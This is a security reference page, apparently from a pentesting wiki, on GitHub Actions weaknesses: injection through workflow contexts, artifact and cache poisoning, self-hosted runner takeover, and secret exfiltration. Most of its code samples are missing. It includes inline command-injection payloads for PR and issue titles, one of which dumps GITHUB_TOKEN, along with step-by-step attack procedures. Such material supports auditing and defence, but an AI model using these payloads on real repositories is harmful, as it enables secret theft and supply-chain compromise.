GitHub Actions
Allowed unsecure commands
There are deprecated set-env
and add-path
workflow commands that can be explicitly enabled by setting the ACTIONS_ALLOW_UNSECURE_COMMANDS
environment variable to true
.
set-env
sets environment variables via the following workflow command::set-env name=<NAME>::<VALUE>
add-path
updates thePATH
environment variable via the following workflow command::add-path::<VALUE>
Depending on the use of the environment variable, this could allow an attacker, in the worst case, to change the path and run a command other than the intended one, leading to arbitrary command execution. For example, consider the following workflow:
The above workflow enables unsecure commands by setting ACTIONS_ALLOW_UNSECURE_COMMANDS
to true
in the env
section. As can be seen, the first step of the deploy
job prints the github
context to the workflow log. Since part of the variables in the github
context is user-controlled, it is possible to abuse unsecure commands to set arbitrary environment variables. For instance, an attacker could use the pull request description to deliver the following payload, which will reset the ENVIRONMENT_NAME
when the github
context is printed:
GitHub Runner will process this line as a workflow command and save a malicious payload to ENVIRONMENT_NAME
. As a result, injecting the ENVIRONMENT_NAME
variable within the actions/github-script
step will lead to code injection.
References:
Artifact poisoning
There are many different cases where workflows use artifacts created by other workflows, for example, to get test results, a compiled binary, metrics, changes made, a pull request number, etc. This opens up another source for payload delivery. As a result, if an attacker can control the content of the downloaded artifacts and that content is not properly validated, it may lead to the execution of arbitrary commands. For example, consider the following workflows:
As can be seen, the first workflow uses the pull_request
event to build a binary from an incoming pull request and upload the compiled binary to the artifacts. Since the workflow uses pull_request
it can be triggered by a third-party user from a fork. Therefore, it is possible to upload a malicious binary to the artifacts. The second workflow uses the workflow_dispatch
, downloads the binary from the pr.yml
workflow and runs the binary. Even though the run.yml
workflow is triggered manually, an attacker could execute arbitrary commands if they poisoned the artifacts just before triggering run.yml
. In this case, the attack flow can look like this:
An attacker forks the repository and makes malicious changes.
An opens a pull request to the base repository.
The
pr.yml
workflow checks out the code from the pull request, builds it and uploads the malicious binary to the artifacts.A maintainer triggers the
run.yml
workflow.The workflow downloads the malicious binary and runs it.
Remember that the pull_request
event may require approval from maintainers for pull requests from forks. By default, pull_request
requires approval only for first-time contributors.
References:
How to detect downloading artifacts?
There are several ways to download artifacts from another workflow. The most common ones can be found below:
Using the
github.rest.actions.listWorkflowRunArtifacts()
method within theactions/github-script
action:Using third-party actions, such as dawidd6/action-download-artifact:
Using the
gh run download
GitHub CLI command:Using the
gh api
GitHub CLI command withgithub.event.workflow_run.artifacts_url
:
Cache poisoning
Any cache in Github Actions shares the same scope as the base branch. Therefore, if the cached content can be altered within the scope of the base branch, it is possible to poison the cache for all branches of the repository.
As a result, whatever is cached from an incoming pull request will be available in all workflows. You can reproduce this behaviour using the steps below.
Poisoning:
Create a workflow in a base repository with the next content:
Fork the repository and add
poison
file with arbitrary content.Create a pull request to the base repository and wait for the workflow to complete.
Exploitation:
Create a new branch in the base repository and change any file.
Create a pull request to the base branch.
The workflow will retrieve the
poison
file from the step 2 of thePoisoning
section above.
Cache and deployment environments
GitHub Actions does not separate different deployment environments during caching. Suppose there are environments development
and production
, where production
can only be run with approval. In this case, only certain people can run a workflow in the production
environment, while everyone else uses the development
environment. However, running these environments on the same branch can lead to cache poisoning in the production
environment, because there is a logical boundary only between branches. In other words, an attacker (under certain circumstances) or any developer with write permissions can poison the cache of the base branch and get arbitrary code execution in the production
environments. Therefore, an attacker or a developer can at least gain access to secrets from the production
environment.
GitHub Runner registration token disclosure
GitHub Actions supports self-hosted runners that users can deploy to run jobs. The deployment process includes registering a self-hosted runner on the GitHub Service. The self-hosted runner registration process is the exchange of a GitHub Runner registration token for a temporary JWT token and the subsequent generation of an RSA key that will be used by a self-hosted runner in the future to issue JWT tokens. Therefore, the GitHub Service allows self-hosted runners to be registered based on the GitHub Runner registration token and subsequently identifies the self-hosted runner by its public key.
The GitHub Runner registration token is a short-term token that has a 1 hour expiration time and it looks like this:
In the case of a GitHub Runner registration token disclosure, an attacker can register a malicious runner, take over jobs, and gain full access to secrets and code.
You can use the next request to check a registration token:
For further exploitation follow the "Adding self-hosted runners" guide to add a malicious runner.
Disclosure of sensitive data
GitHub Actions write all details about a run to workflow logs, which include all running commands and their outputs. Logs of the public projects are available for everyone, and in sensitive data gets into the logs, everyone can access this data. The same applies to byproducts of workflow execution.
References:
Printing sensitive output to workflow logs
The following example prints sensitive data received from the /user
endpoint:
Running commands in the verbose or debug mode
The following example leaks the Auth-Token
header due to the curl verbose -v
key:
Misuse of sensitive data in workflows
New sensitive data may appear during the execution of workflows, for example, received from a third-party service or vault. GitHub Actions provides the add-mask workflow command to mask such data in the workflow logs. If the add-mask
is not used or workflow commands have been stopped sensitive data can leak into the workflow logs.
The following example does not mark TOKEN
as sensitive using add-mask
and curl
will expose the TOKEN
to the logs:
Remember that if you can control the variables that are printed in the workflow logs and there is a step that uses add-mask
to mask new sensitive data, you can disable add-mask
by injecting the stop-commands command into the workflow log.
In the snippet below, an attacker could use the pull request description to deliver a payload and stop workflow command processing, which will cause the token to be exposed despite the add-mask
being used.
The payload may look like this:
Misuse of secrets in reusable workflows
When a job is used to call a reusable workflow, jobs.<job_id>.secrets
can be used to provide a map of secrets that are passed to the called workflow. Under certain circumstances, the misuse of secrets can lead to the disclosure of sensitive data.
Consider the following workflows:
The dispatch.yml
workflow invokes the reusable.yml
reusable workflow and passes AWS_ACCESS_KEY_ID
and AWS_SECRET_ACCESS_KEY
using the creds
secrets. The reusable.yml
workflow parses the creds
secrets and extracts the AWS_SECRET_ACCESS_KEY
and AWS_SECRET_ACCESS_KEY
. Even though ${{ secrets.creds }}
is masked in the logs, and AWS_SECRET_ACCESS_KEY
and AWS_SECRET_ACCESS_KEY
are stored in encrypted secrets, reusable.yml
will reveal the ID and key in plain text.
It happens because by default reusable workflows do not have access to the encrypted secrets and secrets must be defined via the jobs.<job_id>.secrets
. As a result, if some sensitive data is extracted from the passed secrets, as in the example above, it can lead to their leakage into the workflow log.
Below you can find one of the in-wild examples where the docker/build-push-action
parses the npm credentials from the build_args
and leaks them into the logs:
Misuse of secrets in manual workflows
If the workflow_dispacth
workflow receives secrets in the inputs
context and does not mask them, with a high degree of probability the secrets will leak into the workflow log.
For example, the following workflow gets a token from the inputs
context and reveals that token in the workflow log, passing the token to environment variables:
Output parameters and debug mode
All output parameters not marked as sensitive will be logged if the debug mode is enabled.
The following example will leak the tokens into the workflow logs if the debug
mode is enabled:
The workflow log discloses the token in plaintext:
Workflow artifacts
Artifacts in the public repositories are available to everyone for a retention period (90 days by default). Therefore, if sensitive data is leaked into artifacts, an attacker can download them and the sensitive data inside.
Workflow cache
Unlike artifacts, the cache is only available while a workflow is running. However, anyone with read access can create a pull request on a repository and access the contents of the cache. Forks can also create pull requests on the base branch and access caches on the base branch.
Contexts misusing
GitHub Actions workflows can be triggered by a variety of events. Every workflow trigger is provided with contexts. One of the contexts is the GitHub context that contains information about the workflow run and the event that triggered the run.
Context information can be accessed using one of two syntaxes:
Index syntax
github['sha']
Property dereference syntax
github.sha
The list below contains user-controlled GitHub context variables for various events.
GitHub Actions support their own expression syntax that allows access to the context values.
The run: block in the example above creates a bash script based on the content inside the block to execute the script during the Check title
step execution. The content of the run:
block is interpreted as a template and expressions inside ${{ }}
are evaluated and replaced with the resulting values before the bash script is run. Therefore, if an attacker can control a context variable that is used inside ${{ }}
, they will be able to inject arbitrary commands into the bash script. In the case above, an attacker can use the payloads like a"; echo test
or `echo test`
to execute malicious commands.
Another context that can contain user-controlled data is the env context. The env
context contains environment variables that have been set in a workflow, job, or step. Using variable interpolation ${{ }}
with the env
context data in a run:
could allow an attacker to inject malicious commands. In the snippet below, an attacker can create an issue with a payload in the issue title.
Additionally, it is possible to control values of the outputs
property that is provided by steps and needs contexts:
The outputs
property contains the result/output of a specific job or step. outputs
may accept user-controlled data which can be passed to the run:
block. In the following example, an attacker can execute arbitrary commands by creating a pull request named `;arbitrary_command_here();//
because steps.fetch-branch-names.outputs.prs-string
contains a pull request title:
The same applies to data that is sent to the pre and post actions.
References:
Potentially dangerous third-party actions
Remember that injecting user-controlled data into variables of third-party actions can lead to vulnerabilities such as commands or code injection. Below you can find a list of the most common actions which, if misused, can lead to vulnerabilities.
Write workflows scripting the GitHub API in JavaScript
Using variable interpolation ${{ }}
with script:
can lead to JavaScript code injection
A GitHub Action to send queries to GitHub's GraphQL API
Using variable interpolation ${{ }}
with query:
can lead to injection to a GraphQL request
A GitHub Action to send arbitrary requests to GitHub's REST API
Using variable interpolation ${{ }}
with route:
can lead to injection to a request to REST API
Misconfiguration of OpenID Connect
With OpenID Connect, a GitHub Actions workflow requires a token to access resources in a cloud provider. The workflow requests an access token from a cloud provider, which checks the details presented by the JWT. If the trust configuration in the JWT is a match, a cloud provider responds by issuing a temporary token to the workflow, which can then be used to access resources in a cloud provider.
When developers configure a cloud to trust GitHub's OIDC provider, they must add conditions that filter incoming requests, so that untrusted repositories or workflows can't request access tokens for cloud resources. Audience
and Subject
claims are typically used in combination while setting conditions on the cloud role/resources to scope its access to the GitHub workflows.
Audience
: By default, this value uses the URL of the organization or repository owner. This can be used to set a condition that only the workflows in the specific organization can access the cloud role.Subject
: Has a predefined format and is a concatenation of some of the key metadata about the workflow, such as the GitHub organization, repository, branch or associated job environment. There are also many additional claims supported in the OIDC token that can also be used for setting these conditions.
However, if a cloud provider is misconfigured, untrusted repositories can request access tokens for cloud resources.
References:
Misuse of the events related to incoming pull requests
GitHub workflows can be triggered by events related to incoming pull requests. The table below contains all the events that can be used to handle incoming pull requests:
Event
REF
Possible GITHUB_TOKEN
permissions
Access to secrets
PR merge branch
read
no
PR merge branch
write
yes
PR base branch
write
yes
Default branch
write
yes
Default branch
write
yes
pull_request and pull_request_target triggered a workflow when activity on a pull request in the workflow's repository occurs. The main differences between the two events are:
Workflows triggered via
pull_request_target
have write permissions to the target repository and have access to target repository secrets. The same is true for workflows triggered onpull_request
from a branch in the same repository, but not from external forks. The reasoning behind the latter is that it is safe to share the repository secrets if the user has write permissions to the target repository already.pull_request_target
runs in the context of the target repository of the pull request, rather than in the merge commit. This means the standard checkout action uses the target repository to prevent accidental usage of a user-supplied code.
issue_comment runs a workflow when a pull request comment is created, edited, or deleted.
workflow_run runs a workflow when a workflow run is requested or completed. It allows the execution of a workflow based on the execution or completion of another workflow.
Normally, using pull_request_target
, issue_comment
or workflow_run
is safe because actions only run code from a target repository, not an incoming pull request. However, if a workflow uses these events with an explicit checkout of a pull request, it can lead to untrusted commands or code execution.
There are several ways to check out a code from a pull request:
Using the actions/checkout action to checkout changes from a head repository.
Explicitly checking out using
git
in therun:
block.Use GitHub API or third-party actions:
The following context variables may help to find cases where an incoming pull request is checked out:
References:
Confusion between head.ref and head.sha
Sometimes developers implement workflows in such a way that they require manual review before execution. It is guaranteed that untrusted content will be reviewed by a maintainer before execution. Consider the following workflow:
As can be seen, the workflow is triggered when the approved
label is set on a pull request. In other words, only a maintainer with write permissions can manually trigger this workflow. However, the workflow is still vulnerable, because it uses github.event.pull_request.head.ref
to check out the repository content. Consider the difference between head.ref
and head.sha
. head.ref
points to a branch while head.sha
points to a commit. This means that if head.sha
is used to check out a repository, the content will be fetched from the commit that was used to trigger the workflow. In the case of labeling a pull request, it will be the HEAD commit that was reviewed by a maintainer before the label was set. However, if head.ref
is used, a repository is checked out from the base branch. As a result, an attacker can inject a malicious payload right after the manual approval (TOCTOU attack). The attack flow may look like this:
An attacker forks a target repository.
An attacker makes valid changes and opens a pull request.
An attacker waits for the label to be set.
A maintainer sets the
approved
label that triggers the vulnerable workflow.An attacker pushes a malicious payload to the fork.
The workflow checks out the malicious payload and executes them.
Misuse of the pull_request_target event in non-default branches
The pull_request_target
event can be used to trigger workflows in non-default branches if there is no restriction based on branches
and branches-ignore
filters.
GitHub uses the workflow from a non-default branch when creating a pull request to that branch. Therefore, if there is a vulnerable workflow in a non-default branch that can be triggered by the pull_request_target
event, an attacker can open a pull request to that branch and exploit a vulnerability.
This is a common pitfall when fixing vulnerabilities, developers can only fix a vulnerability in the default branch and leave the vulnerable version in non-default branches.
Misuse of the workflow_run event
workflow_run was introduced to enable scenarios that require building the untrusted code and also need write permissions to update a pull request with e.g. code coverage results or other test results. To do this in a secure manner, the untrusted code is handled via the pull_request trigger so that it is isolated in an unprivileged environment. The workflow processing a pull request stores any results like code coverage or failed/passed tests in artifacts and exits. The following workflow then starts on workflow_run
where it is granted write permission to the target repository and access to repository secrets so that it can download the artifacts and make any necessary modifications to the repository or interact with third-party services that require repository secrets (e.g. API tokens).
Nevertheless, there are still ways of transferring data controlled by a user from untrusted pull requests to a privileged workflow_run
workflow context:
The
github.event.workflow_run
context. Please, check out Contexts misusing and Misuse of the events related to incoming pull requests for more details.Artifacts. Please, check out Artifact poisoning for more details.
Even if a workflow_run
workflow does not properly use context variables or artifacts, it may still be unexploitable because the pull_request
event requires approval from maintainers for pull requests from forks. By default, pull_request
workflows require approval only for first-time contributors. So, if a repository does not require approval for all outside collaborators (default behaviour), you can make changes to the target repository to become a contributor. After that, you will be able to fully control a pull_request
workflow for exploitation.
References:
Misuse of self-hosted runners
Self-hosted runners can be launched as an ephemeral using the --ephemeral option. ephemeral option configures a self-hosted runner to only take one job and then let the service un-configure the runner after the job finishes. This is implemented by sending the ephemeral
value within a request during runner registration:
As a result, an ephemeral runner has the following lifecycle:
The runner is registered with the GitHub Actions service.
The runner takes one job and performs it.
When the runner completes the job, it cleans up the local environment (
.runner
,.credentials
,.credentials_rsaparams
files).The GitHub Actions service automatically de-registers the runner.
Therefore, if an attacker gains access to an ephemeral self-hosted runner, they will not be able to affect other jobs.
However, self-hosted runners are not launched as ephemeral by default and there is no guarantee around running in an ephemeral clean virtual environment. So, runners can be persistently compromised by untrusted code in a workflow. An attacker can abuse a workflow to access the following files that are stored in a root folder of a runner host:
.runner
that contains general info about a runner, such as an id, name, pool id, etc..credentials
that contains authentication details such as the scheme used and authorization URL..credentials_rsaparams
that contains the RSA parameters that were generated during the registration and are used to sign JWT tokens.
These files can be used to takeover a self-hosted runner with the next steps:
Fetch
.runner
,.credentials
,.credentials_rsaparams
files with all the necessary data written during the runner registration.Get an access token using the following request:
Where:
UUID
can be found in the.credentials
file.BEARER_TOKEN
is generated using the parameters from.credentials
and.credentials_rsaparams
files.
Remove a current session:
Where:
RANDOM_PREFIX
can be found in the.runner
file.SESSION_ID
is a session ID that can be found in the_diag/Runner_<DATE>-utc.log
file with the runner logs.BEARER_TOKEN
is a bearer token from the response in the previous step.
Copy the
.runner
,.credentials
,.credentials_rsaparams
files to a root folder of a malicious runner.Run a malicious runner.
The takeover has the greatest impact when a self-hosted runner is defined at the organization or enterprise level because GitHub can schedule workflows from multiple repositories onto the same runner. It allows an attacker to gain access to the jobs which will use the malicious runner.
References:
Using the pull_request event with self-hosted runners
GitHub does not provide a mechanism to prevent the pull_request
event from being triggered from forks. The only thing available is to require approval for all outside collaborators. However, if approval is only required for the first contribution, you can make some valid changes and then add a malicious workflow that uses pull_request
for running on a self-hosted runner.
References:
Detection of the use of self-hosted runners
You can find using of self-hosted runners by the following runs-on labels (remember about a build matrix as well):
self-hosted
default label applied to all self-hosted runners.linux
,windows
, ormacOS
applied depending on an operating system.x64
,ARM
, orARM64
applied depending on hardware architecture.Custom labels, which are manually assigned to self-hosted runners (there is a list with GitHub-hosted runner labels which can't be custom ones).
Using vulnerable actions
An action is a custom application for the GitHub Actions platform that performs a complex but frequently repeated task. Like any code actions can be vulnerable - it can be a vulnerability in the code of an action or a used package or dependency. Since individual jobs in a workflow can interact with other jobs, if one of the jobs uses a vulnerable action, it can compromise the entire workflow. For example, a job querying the environment variables used by a later job, writing files to a shared directory that latter job processes, or even more directly by interacting with the Docker socket and inspecting other running containers and executing commands in them.
There are three types of actions:
Composite action
Composite action is used to execute the defined steps that can run shell code or use other actions. Since a composite action can run scripts written in different languages (bash, python, go, etc.), they can also be vulnerable to common weaknesses like code and command injection, path traversal, etc.
Command injection
Composite actions allow defining inputs that can be used during execution:
Handling inputs is performed using variable interpolation ${{ ... }}
. Therefore, if the inputs are embedded directly into the run: block, an attacker can inject arbitrary commands:
As a result, it is possible at least extract secrets from environment variables and generated shell scripts. For instance, in the snippet below an attacker can open an issue with title ";{cat,/home/runner/work/_temp/$({xxd,-r,-p}<<<2a)}|{base64,-w0};#
to dump GITHUB_TOKEN
:
The same applies to contexts that can be used for command injection, check out Contexts misusing.
Disclosure of sensitive data
New sensitive data may appear during the execution of composite actions, such as temporary tokens, retrieved data, etc. GitHub Actions allow developers to mask this data in logs using add-mask workflow command. So, if the add-mask
is not used or workflow commands have been stopped sensitive data can leak to the run logs:
JavaScript action
JavaScript action is used to execute a Node.js code. Since a JavaScript action is a Node.js application, it can be vulnerable to common Node.js weaknesses such as code and command injection, prototype pollution, etc.
actions/github-script allows executing of JavaScript code as well and all vulnerabilities described here apply to the actions/github-script
action
Command injection
GitHub Actions toolkit provides the @actions/exec package to execute shell commands:
github-script provides the exec object to access the exec package:
If user-controlled data (inputs, GitHub context, etc.) is passed directly to the exec
it can lead to command or argument injection.
Disclosure of sensitive data
New sensitive data may appear during the JavaScript action execution, such as temporary tokens, retrieved data, etc. For such sensitive data to be masked in the logs, the @actions/core provides the core.setSecret method. code.setSecret
registers the data in the runner to ensure it is masked in the logs. Therefore, if the code.setSecret
is not used sensitive data can leak to workflow run logs.
For instance, the sample below will leak api_token
to logs if the debug mode is enabled:
The workflow log discloses the token in plaintext:
Github context
JavaScript actions can access the GitHub context via @actions/github:
github-script provides the context object to access the GitHub context:
The next variables in the GitHub context are controlled by a user:
context.payload.pull_request.title
context.payload.pull_request.body
context.payload.pull_request.head.ref
context.payload.pull_request.head.label
context.payload.pull_request.head.repo.default_branch
context.payload.pull_request.head.repo.description
context.payload.pull_request.head.repo.homepage
context.payload.issue.body
context.payload.issue.title
context.payload.comment.body
context.payload.discussion.body
context.payload.discussion.title
These variables can be used as a source to pass arbitrary data to vulnerable code.
Octokit GraphQL API injection
@actions/github allows making GraphQL requests (check https://github.com/octokit/graphql.js for the API):
github-script provides the github object to access the octokit
client:
If user-controlled data (inputs, GitHub context, etc.) is passed directly to the query
it can lead to an injection into GraphQL request.
There is octokit/graphql-action which can be vulnerable to the injection as well, check out Contexts misusing
Octokit REST API injection
@actions/github allows making requests to REST API (check https://octokit.github.io/rest.js for the API):
github-script provides the github object to access the octokit
client:
If user-controlled data (inputs, GitHub context, etc.) is passed directly to the next methods it can lead to injection into requests to REST API:
There is octokit/request-action which can be vulnerable to the injection as well, check out Contexts misusing
Docker action
Docker container action is used to run a Docker container and execute a code in Docker. Since a Docker container action runs scripts written in different languages (bash, python, go, etc.), they can also be vulnerable to common weaknesses like code and command injection, path traversal, etc.
Disclosure of sensitive data
New sensitive data may appear during the execution of Docker container actions, such as temporary tokens, retrieved data, etc. GitHub Actions allow developers to mask this data in logs using add-mask workflow command. So, if the add-mask
is not used or workflow commands have been stopped sensitive data can leak to the run logs:
Using a malicious docker image
In addition to a local Dockerfile
in a repository, third-party Docker images from a registry can be used. Therefore, these Docker images may be vulnerable, causing the container to be compromised.
References:
Sensitive mounts
Github runner passes part of the environment variables and mounts volumes when running a Docker container:
Here it is worth paying attention to at least the following things:
Exposed Docker socket at
/var/run/docker.sock
. It allows an attacker to escape from the container. Please, check out Container: Escaping - Exposed Docker Socket/github/workspace
is a folder with repository content. For example, an attacker can grab a repository token from the/github/workspace/.git/config
file, check out the "Exfiltrating data from a runner" section.
Unclaimed actions
Third-party actions may be available for claiming because the namespace (username or organization name) has been changed or removed. If the namespace has been changed GitHub will redirect the old namespace to the new one and thus workflows that use the actions with the old namespace will continue to execute successfully. In this case, an attacker can try to claim the old namespace by registering a user or creating an organization. If it is possible, an attacker can create a malicious action which will later be executed by workflows that use actions with the claimed namespace.
References:
Reusing vulnerable workflows
GitHub Actions allows making workflows reusable using the workflow_call event. It allows calling a reusable workflow from another workflow by anyone who has access to this workflow:
Reusable workflows are very similar to third-party actions. They are run in the context of a called workflow and allow defining inputs. Therefore, reusable workflows may misuse user-controlled input or context variables, which could lead to the same vulnerabilities that are described for workflows and third-party actions on this page.
The reusable workflow from the snippet above is vulnerable to command injection. If the username
input variable will be controlled by an attacker, they can leak envPAT
using the following payload as username
:
Another example is the following workflow which checkouts a code from an incoming PR and runs npm install
against it:
References:
Vulnerable if-conditions
The if
condition is used in a workflow file to determine whether a step should run. When an if
conditional is true
, the step will run. It can be useful from a security perspective as well. For example, the following if
statement can be used to allow only pull requests from the base repository:
However, these if
conditions can be vulnerable and lead not to the behavior that is originally expected.
Incorrect comparison
Expressions implement the insensitive comparison that can be misused during protection implementation. For example, the following if
condition will be true
:
GitHub provides the contains()
function that can be used in an if
condition incorrectly. For example in the following example, an author has restricted the execution of the step to only bots using contains()
:
However, this condition can be easily met by creating a new bot.
Labels on PRs
One approach to control the workflow execution is to use labels on pull requests. This is possible because a label on a pull request can only be set by a project member. As a result, it allows running a workflow only after a project member has reviewed a pull request and set an appropriate label:
If a workflow uses pull_request or pull_request_target events with the synchronize
action type, it will be triggered when the head repository is updated. Since new changes to a pull request do not remove labels, the if
condition can be bypassed in the example above like this:
Create a pull request with valid changes.
Wait for the label to be set.
Update the pull request with malicious code.
The updates will trigger the workflow.
Misusing context variables
Using wrong context variables can cause if
condition to always be true
or false
regardless of the situation. For example, the following if
condition uses github.event.pull_request.base.repo.full_name
instead of github.event.pull_request.head.repo.full_name
variable to ignore pull requests from forks:
However, this condition will be always true
. The same behaviour will be achieved if github.repository
is used for comparing against the repository name:
Skipping mandatory checks
A workflow can implement various types of checks during running. For example, it can check if an actor is a member of an organization or if they have write permissions for the current repository. This can be done using third-party actions or a custom validation based on the GitHub API. However, not all such actions interrupt execution if a check fails, some of them return a boolean value for subsequent verification. For instance, the following snippet shows a check for the presence of an actor in an org team:
Nevertheless, the snippet above is vulnerable because there is no the id:
field for the Fetch team member list
step. As a result, ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }}
is always false
. So, the fixed version looks like the following:
Unclaimed or incorrect usernames
If the workflow uses something like this:
Make sure all these users exist as they may have already been deleted or misspelled.
The potential impact of a compromised runner workflow
Workflows triggered using the pull_request
event have read-only permissions and have no access to secrets. However, these permissions differ for various event triggers such as issue_comment
, issues
or push
, where you could attempt to steal repository secrets or use the write permission of the job's GITHUB_TOKEN.
GITHUB_TOKEN
is the same token that GitHub Apps use. For information about the API endpoints, GitHub Apps can access with each permission, check out the "GitHub App Permissions" page. You can find the permissions for GITHUB_TOKEN
in a workflow log on the Set up job
step:
References:
Accessing secrets through environment variables
If secrets are passed to an environment variable, you can directly access them in the following ways:
Accessing secrets from the run: step
If a secret is used directly in an expression ${{ }}
in the run:
block, like:
The generated shell script will be stored on the disk in the /home/runner/work/_temp/
folder. This script contains the secret in plain text because GitHub Runner evaluates the expressions inside of ${{ }}
and substitutes them with the resulting values before running the script in the run:
block. Therefore, the secret can be accessed with the following command:
Note that this behavior is independent of shell settings.
Accessing secrets through rewriting third-party actions
If you have an arbitrary command execution in front of a third-party action that handles secrets:
You can steal secrets by rewriting third-party action code. GitHub Runner checks out all third-party action repositories during the Set up
step and saves them to the /home/runner/work/_actions/
folder. For example, fakeaction/publish@v3
will be checked out to the /home/runner/work/_actions/fakeaction/publish/v3/
folder. Therefore, you can rewrite a third-party action with a malicious one using command injection to access secrets.
The easiest way is to override the action.yml
file with a composite action that leaks secrets:
Leaking repository and organization secrets by adding a malicious workflow
GitHub no longer allows modifying files in the .github/workflows
folder or merging a branch from forks with changes in the .github/workflows
folder using GITHUB_TOKEN
. You need a personal access token with repo
and workflow
scopes to be able to add a malicious workflow.
Usually, non-default branches have no branch protection rules. If you have access to GITHUB_TOKEN
with the pull_requests:write
scope, you can add an arbitrary workflow to a non-default branch. Since the pull_request_target
workflow in non-default branches can be triggered by a user, you can leak all repository and organization secrets using the following steps:
Fork the target repo.
Add a malicious
pull_request_target
workflow:Create a pull request to a non-default branch.
Merge the pull request using
GITHUB_TOKEN
withpull_requests:write
scope:After merging the pull request open a pull request to the non-default branch from the fork.
Wait for the malicious workflow to complete.
It will leak all secrets to the logs.
If GITHUB_TOKEN
has the contents:write
scope, you can create a new non-default branch using the following API request:
Exfiltrating secrets from a runner
An attacker can exfiltrate any stored secrets or other data from a runner. Actions and scripts may store sensitive data on the filesystem:
.git/config
actions/checkout
action by default stores the repository token in a .git/config
file unless the persist-credentials: false
argument is set
$HOME/.jira.d/credentials
$HOME/.azure
Azure/login
action by default use the Azure CLI for login, that stores the credentials in $HOME/.azure
folder
$HOME/.docker/config.json
$HOME/.docker/config.json
$HOME/.docker/config.json
$GITHUB_WORKSPACE/gha-creds-<RANDOM_FILENAME>.json
$HOME/.terraformrc
Exfiltrating secrets from memory
Any secrets that are used by a workflow are passed to the GitHub Runner at startup; therefore secrets are placed in the process's memory. You can try to exfiltrate secrets from the memory dump.
GITHUB_TOKEN
is always passed to the runner, even if it is not referenced in a workflow or included action.
You can use the following script to dump the memory and find GITHUB_TOKEN
:
Approving pull requests
As of May 2022, creating and approving pull requests by GitHub Actions is disabled for all new repositories and organizations by default, check out GitHub Docs: Preventing GitHub Actions from creating or approving pull requests
You can grant write permissions on the pull requests API endpoint and use the API to approve a pull request. It can be used to bypass branch protection rules when a main branch requires 1 approval and does not require review from code owners.
For instance, if you can write to non-main branches of a repository, you can bypass the protection using the next steps:
Create a branch and add the following workflow:
Create a pull request.
The pull request will require approval.
Once the action is complete,
github-actions
bot will approve the changes.You can merge the changes to the main branch.
Modifying the contents of a repository
An attacker can use the GitHub API to modify repository content, including releases if the assigned permissions of GITHUB_TOKEN
are not restricted.
References:
Access cloud services via OpenID Connect
If a vulnerable workflow has the GITHUB_TOKEN
with the id-token:write
scope you can request the OIDC JWT ID token to access cloud resources.
References:
Trigger workflow_dispatch workflows
GITHUB_TOKEN
with the actions:write
scope can be used to create a workflow dispatch event via API. It allows triggering workflows using the workflow_dispacth event and expanding the attack surface.
In the request above, you can control workflow arguments using the inputs
parameter. If a workflow does not properly handle data from the inputs
context, you might get the command execution.
References:
Trigger repository_dispatch workflows
GITHUB_TOKEN
with the metadata:read
and contents:read&write
scopes can be used to create a repository dispatch event via API. It allows triggering workflows using the repository_dispatch event and expanding the attack surface.
In the request above, you can control workflow arguments using the client_payload
parameter. If a workflow does not properly handle data from the github.event.client_payload
context, you might get the command execution.
References:
Last updated